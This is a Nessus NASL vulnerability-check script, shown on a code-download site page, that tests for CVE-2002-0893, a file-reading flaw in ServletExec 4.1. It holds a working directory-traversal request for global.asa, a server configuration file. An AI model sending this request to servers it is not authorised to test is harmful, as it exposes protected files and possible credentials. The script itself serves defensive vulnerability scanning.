⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 servletexec_file_reading.nasl

📁 漏洞扫描源码,可以扫描linux,windows,交换机路由器
💻 NASL
字号:
## This script was written by Matt Moore <matt.moore@westpoint.ltd.uk>## Script audit and contributions from Carmichael Security <http://www.carmichaelsecurity.com>#      Erik Anderson <eanders@carmichaelsecurity.com>#      Added BugtraqID and CAN## See the Nessus Scripts License for details#if(description){ script_id(10959); script_bugtraq_id(4795); script_version ("$Revision: 38 $"); script_cve_id("CVE-2002-0893"); name["english"] = "ServletExec 4.1 ISAPI File Reading"; name["francais"] = "ServletExec 4.1 ISAPI File Reading"; script_name(english:name["english"], francais:name["francais"]);  desc["english"] = "By invoking the JSPServlet directly it is possible to read the contents of files within the webroot that would not normally be accessible (global.asa, for example.) When attempting to retrieve ASP pages it is common to see many errors due to their similarity to JSP pages in syntax, and hence only fragments of these pages are returned. Text files can generally be read without problem.Solution: Download Patch #9 from ftp://ftp.newatlanta.com/public/4_1/patches/References: www.westpoint.ltd.uk/advisories/wp-02-0006.txtRisk factor : Medium"; script_description(english:desc["english"]);  summary["english"] = "Tests for ServletExec File Reading";  script_summary(english:summary["english"]);  script_category(ACT_GATHER_INFO);  script_copyright(english:"This script is Copyright (C) 2002 Matt Moore",		francais:"Ce script est Copyright (C) 2002 Matt Moore"); family["english"] = "CGI abuses"; family["francais"] = "Abus de CGI"; script_family(english:family["english"], francais:family["francais"]); script_dependencie("find_service.nes", "no404.nasl"); script_require_ports("Services/www", 80); exit(0);}# Check starts hereinclude("http_func.inc");include("http_keepalive.inc");port = get_http_port(default:80);if(get_port_state(port)){ # Uses global.asa as target to retrieve. Could be improved to use output of webmirror.nasl req = http_get(item:"/servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5cglobal.asa", port:port); r = http_keepalive_send_recv(port:port, data:req); if ( ! r ) exit(0); confirmed = string("OBJECT RUNAT=Server");  if(confirmed >< r)	 	security_warning(port);}

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -